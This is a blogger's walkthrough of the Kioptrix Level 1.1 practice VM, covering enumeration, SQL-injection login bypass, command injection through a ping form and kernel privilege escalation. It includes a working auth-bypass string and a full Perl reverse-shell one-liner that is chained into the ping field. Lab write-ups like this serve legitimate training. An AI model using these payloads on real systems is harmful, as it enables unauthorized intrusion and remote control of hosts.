Kioptrix 2

Kioptrix Level 1.1

This one taught me something I should’ve learned a long time ago. By the end of this VM, I was banging my head against a wall for NO REASON but I had done several Vulnerable Machines that night.

Enumeration

I started off Creating my folder on the desktop labeled as kioptrix_1.1 and then started my enumeration steps. I know the folder step sounds silly but Over 2 rounds of PWK labs and getting lots of boxes on hack the box I’ve come to appreciate methodology and organization. The more organized you are when it comes to enumeration the faster you are going to get into a box.

Started off with nmap -sV -p- 10.0.0.52

The above nmap command can be translated to hey nmap scan this IP address and use these flags -p- is all ports -sV is probe ports for service and version information. This tool is huge and should be researched. If you are not familiar with nmap the Docs can be found on the website. There is a Handy Cheat-Sheet over at highon.coffee that you can use as well.

The output from the above nmap command.

Open Ports openports

Next Step is to go over the information above.

  • 22 – Unless I have a list of users to try rockyou or seclists most of the time I don’t bother unless I see funky version numbers
  • 80 – Awesome Apache a Version number I can google and its letting me know its centOS!
  • 111 – Again a port I don’t mess with unless I see something funky
  • 443 – Same as Port 80 except never ignore it run all the same tests you would on port 80 here
  • 631 – CUPS 1.1 hmm CUPS is the printer system on Linux there is a version number so we need to google it for low hanging fruit
  • 767 – Status port google it and see what common ports in top 1024 use it maybe come up with something but there are way lower hanging fruit than this
  • 3306 – Unauthorized mysql Need to look at this and see if there are any vulns or maybe users without passwords?

I need to make a judgment call here as to what I should start poking at first. Port 80 has version numbers for apache so I open up a terminal and use nikto to scan port 80. Nikto is the defacto standard for scanning websites. The github has documentation.

nikto

From the above scan Results, I can see HTTP Methods, Apache Version, PHP Query Strings, tcn header msg, and then several web directories. So we Searchsploit Apache 2.0.52 and explore the new web directories. Upon Going to the website I found a login page…(should have just checked this at the start)

Weblogin

So I get to this page and try basic defaults admin / admin etc and right click to view source to make sure there wasn’t a redirect. I also start throwing some special characters into the fields to see if I can get any error messages. This sql-injection cheat sheet from netsparker as some basic sql injection for auth bypass.

 ' or 1=1--

Using the above SQLi in both the Username and Password field will allow you to bypass authentication and login to a new index page that is asking you to ping a webpage.

Webping

I ping 127.0.0.1 and see what it does and it echoes the stuff out. I know that the | pipe will chain commands together in a unix environment.

| ls -al

and that returns a directory list.

| cat pingit.php

Use the above to see how pingit.php is working.

';
        echo shell_exec( 'ping -c 3 ' . $target );
        echo '

'; } ?>

So we have arbitrary command injection. We Should be able to get a local shell.

Start your netcat listener

nclistener

I used the Perl reverse shell, but there are other reverse shells that would have worked like the Perl reverse shell I used below. Pentest Monkey again has a awesome cheat sheet for reverse shells. Highon.coffee has a nice cheat sheet as well for reverse shells.

perl -e 'use Socket;$i="10.0.0.50";$p=4432;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Using the shell above we chain it together with | and get a reverse shell

127.0.0.1|perl -e 'use Socket;$i="10.0.0.50";$p=4432;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

local

Priv Esc

Start your python simple HTTP server I prefer to use python when I can its fast to stop start etc..

pythonweb

There are two scripts linuxpriv.py and LinEnum.sh

The number of times I’ve Referenced g0tmi1k’s blog it might as well be open all the time at least during pwk!

Long story short I ran the two scripts combed thru the output and kept looking at different things. I knew I was looking for something simple. Looking at Abatchy’s blog there was something I overlooked and never should of. Should of been step number one when I got local besides id or whoami. I didn’t check kernel version it was staring at me in the face while I looked for vulnerable packages and bad configuration’s. This box taught me to always check the basics and go back after 10 or 15 minutes of hunting and go look at the basics again. A simple uname -a would have saved me hours of being flustered for no reason. output

The First thing when you google 2.6.9-55 is this exploit.

Compile and run and Root!

root